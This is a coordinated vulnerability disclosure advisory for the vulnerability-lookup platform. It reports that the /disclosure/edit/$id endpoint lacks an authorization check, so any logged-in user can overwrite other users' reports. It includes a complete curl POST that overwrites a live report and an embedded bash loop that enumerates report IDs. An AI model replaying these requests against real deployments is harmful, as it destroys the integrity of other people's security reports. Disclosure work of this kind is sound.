vulnerability-lookup: Overwriting other submitters CVD reports

Disclosure Status

approved

March 31, 2026

April 09, 2026

Description

Finding

The Vulnerability Disclosure endpoint /disclosure/edit/$id does not check authorization for POST requests. This allows logged in users to overwrite others reports.

Reproducibility

I'll be honest, I didn't do a lot of testing here as this is fundamentally destructive/dangerous & I don't have a test environment. I did some basic testing on vulnerability.circl.lu with my Alt Accounts (nyanbinary-2) against this account (nyanbinary) on the previous report with the UUID 1bdb4bec-9da1-4c4c-9626-271cba6feef3 / ID 13 by modifying the Credit field with my alt account, verifying the change in the frontend with my main account, and changing it back subsequently through the frontend.

How to:

curl -v 'https://vulnerability.circl.lu/disclosure/edit/13' \
  --compressed \
  -X POST \
  -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:147.0) Gecko/20100101 Firefox/147.0' \
  -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' \
  -H 'Accept-Language: en-US,en;q=0.9' \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  -H 'Origin: https://vulnerability.circl.lu' \
  -H 'Sec-GPC: 1' \
  -H 'Connection: keep-alive' \
  -H 'Referer: https://vulnerability.circl.lu/disclosure/edit/13' \
  -H "Cookie: theme=light; vulnerability-lookup=$COOKIE" \
  -H 'Upgrade-Insecure-Requests: 1' \
  -H 'Sec-Fetch-Dest: document' \
  -H 'Sec-Fetch-Mode: navigate' \
  -H 'Sec-Fetch-Site: same-origin' \
  -H 'Sec-Fetch-User: ?1' \
  -H 'Priority: u=0, i' \
  --data-raw "csrf_token=$CSRF&reporter_legal_status=$LEGAL_STATUS&title=vulnerability-lookup%3A+Non-critical+information+leak+of+assigned+vulnerability+IDs+in+CVD&description=%23%23%23+Finding%0D%0AThe+%60%2Fdisclosure%2Fedit%2F%24id%60+and+%60%2Fdisclosure%2F%24id%2Fcomments%60+pages+use+the+sequentially+assigned+vulnerability+disclosure+ID+instead+of+the+UUID.+They+also+treat+non-existing+disclosures+%26amp%3B+other+users+disclosure+differently+%28http+status+404%2C+403%29+when+requested+by+a+signed+in+user.+This+allows+signed+in+users+to+obtain+information+on+created+disclosure+tickets+%26amp%3B+track+creation+of+new+tickets.%0D%0A%0D%0A%23%23%23+Reproducibility%0D%0ALoop+over+IDs+%28using+my+alt+account+-+doesn%27t+work+with+an+admin+account%29%3A%0D%0A%60%60%60bash%0D%0Afor+counter+in+%24%28seq+1+30%29%3B+do+curl+%22https%3A%2F%2Fvulnerability.circl.lu%2Fdisclosure%2F%24counter%2Fcomments%22+%5C%0D%0A++--compressed+%5C%0D%0A++-H+%27User-Agent%3A+Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A147.0%29+Gecko%2F20100101+Firefox%2F147.0%27+%5C%0D%0A++-H+%27Accept%3A+text%2Fhtml%2Capplication%2Fxhtml%2Bxml%2Capplication%2Fxml%3Bq%3D0.9%2C*%2F*%3Bq%3D0.8%27+%5C%0D%0A++-H+%27Accept-Language%3A+en-US%2Cen%3Bq%3D0.9%27+%5C%0D%0A++-H+%27Accept-Encoding%3A+gzip%2C+deflate%2C+br%2C+zstd%27+%5C%0D%0A++-H+%27Referer%3A+https%3A%2F%2Fvulnerability.circl.lu%2Fuser%2Fvulnerability_disclosures%27+%5C%0D%0A++-H+%27Sec-GPC%3A+1%27+%5C%0D%0A++-H+%27Connection%3A+keep-alive%27+%5C%0D%0A++-H+%27Cookie%3A+vulnerability-lookup%3D%5Bremoved%5D%3B+theme%3Dlight%27+%5C%0D%0A++-H+%27Upgrade-Insecure-Requests%3A+1%27+%5C%0D%0A++-H+%27Sec-Fetch-Dest%3A+document%27+%5C%0D%0A++-H+%27Sec-Fetch-Mode%3A+navigate%27+%5C%0D%0A++-H+%27Sec-Fetch-Site%3A+same-origin%27+%5C%0D%0A++-H+%27Sec-Fetch-User%3A+%3F1%27+%5C%0D%0A++-H+%27Priority%3A+u%3D0%2C+i%27%5C%0D%0A++-s+-o+%2Fdev%2Fnull+-w+%22%24counter%3A+%25%7Bhttp_code%7D%5Cn%22%3B%0D%0Adone%0D%0A%60%60%60%0D%0A%0D%0AThis+results+in%3A%0D%0A*+Status+403+for+IDs+2%2C+3%2C+11%2C+12+-+the+latter+two+being+disclosure+reports+I+raised+earlier%0D%0A*+Status+404+for+everything+else%0D%0A%0D%0AThis+indicates+2%2C+3%2C+11%2C+12+being+existing+reports%2C+everything+else+never+having+been+raised+or+...+I+assume+deleted%3F%0D%0A%0D%0A%23%23%23+Impact%0D%0AMinor+technical+information+leak+-+this+information+could+be+used+to+only+track+number+%26amp%3B+deletion+of+reports%2C+no+contents.+This+is+highly+unlikely+to+be+an+issue+for+a+CSIRTs+running+such+software%2C+impacted+for+orgs+with+smaller+scope+%28e.g.+vendor+GNAs%29+is+also+unlikely+to+be+significant.%0D%0A%0D%0A%23%23%23+Patches%0D%0ANo.%0D%0A%0D%0A%23%23%23+Workarounds%0D%0ANot+worth+it.%0D%0A%0D%0A%23%23%23+References&vulnerability_id=&affected_products=circl%3Avulnerability-lookup&credits=binary" -o out.html

The missing variables ($COOKIE, $CSRF, $LEGAL_STATUS) can be pulled by an attacker near the time of the attack from the frontend (e.g. by opening disclosure/new and extracting the values via dev console).

Please be careful with verifying :giggle:

Impact

Integrity of vulnerability disclosure reports can not be guaranteed. I did not find a way to read the contents of the previous entry (authorization check appears to be in place there) for subtle manipulations, so you'd have to overwrite the entire report.

Patches

Nope

Workarounds

Nyet.

References

Details

GCVE-1-2026-0014

circl:vulnerability-lookup

nyanbinary

862